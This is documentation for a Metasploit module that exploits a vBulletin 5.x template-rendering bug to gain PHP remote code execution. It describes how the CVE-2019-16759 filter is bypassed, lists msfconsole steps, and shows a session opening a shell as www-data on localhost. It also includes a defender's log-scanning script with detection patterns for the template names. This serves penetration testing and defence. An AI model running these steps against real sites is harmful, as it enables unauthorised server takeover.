metasploit-gs/documentation/modules/exploit/multi/http/vbulletin_widget_template_rce.md
2025-07-17 09:53:40 +01:00

Vulnerable Application

vBulletin is a popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.

Description

This module exploits a logic bug in the template rendering code of vBulletin 5.x. It uses vBulletin's template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also supplying the 'widget_php' argument, which causes the former template to load the latter, bypassing the filters originally put in place to address CVE-2019-16759. The exploit thereby reaches an eval call with user-controlled input, which gives the module PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
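For defenders, the template pairing described above is a usable detection signal. The following is an added example, not part of the module or its documentation: it scans JSON request logs for requests that name both templates, decoding nested percent-encoding first. The log schema (`src`, `uri`, `body`), the paths and the parameter names in the sample lines are constructed assumptions and do not reflect vBulletin's actual request format.

```python
import json
from urllib.parse import unquote_plus

# Template names taken from the module description above.
OUTER_TEMPLATE = "widget_tabbedcontainer_tab_panel"
INNER_TEMPLATE = "widget_php"

def normalise(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded names still match."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()

def classify(record):
    """Return 'alert', 'review' or None for one logged request."""
    raw = (record.get("uri") or "") + "\n" + (record.get("body") or "")
    haystack = normalise(raw)
    if INNER_TEMPLATE not in haystack:
        return None
    # Both names together is the combination the description says bypasses the filters.
    return "alert" if OUTER_TEMPLATE in haystack else "review"

def scan(lines):
    """Return (verdict, src, uri) for each suspicious JSON log line."""
    hits = []
    for line in lines:
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than abort the scan
        if isinstance(record, dict) and (verdict := classify(record)):
            hits.append((verdict, record.get("src"), record.get("uri")))
    return hits

# Constructed sample log lines; schema, paths and parameter names are hypothetical.
SAMPLE_LOG = [
    '{"src": "198.51.100.7", "uri": "/forum/render?tpl=widget_tabbedcontainer_tab_panel", "body": "sub%5B0%5D=widget_php"}',
    '{"src": "203.0.113.9", "uri": "/forum/render?tpl=widget%255Fphp", "body": ""}',
    '{"src": "192.0.2.44", "uri": "/forum/index.php", "body": "q=widget+settings"}',
    'truncated {"src": ',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

This only works where the logging layer (reverse proxy or WAF) records request bodies; a plain access log that stores only the request line will miss names sent in a POST body.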

Verification Steps

  1. Do: use exploit/multi/http/vbulletin_widget_template_rce
  2. Do: set RHOSTS [IP]
  3. Do: set VHOST [HOSTNAME]
  4. Do: set LHOST [IP]
  5. Do: set TARGETURI [PATH]
  6. Do: set PAYLOAD [PAYLOADNUM]
  7. Do: run

Options

TARGETURI

The base URI path of vBulletin. Default: /

PHP_CMD

The PHP function to use to execute commands on the target. Default: shell_exec

Scenarios

msf > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf exploit(multi/http/vbulletin_widget_template_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)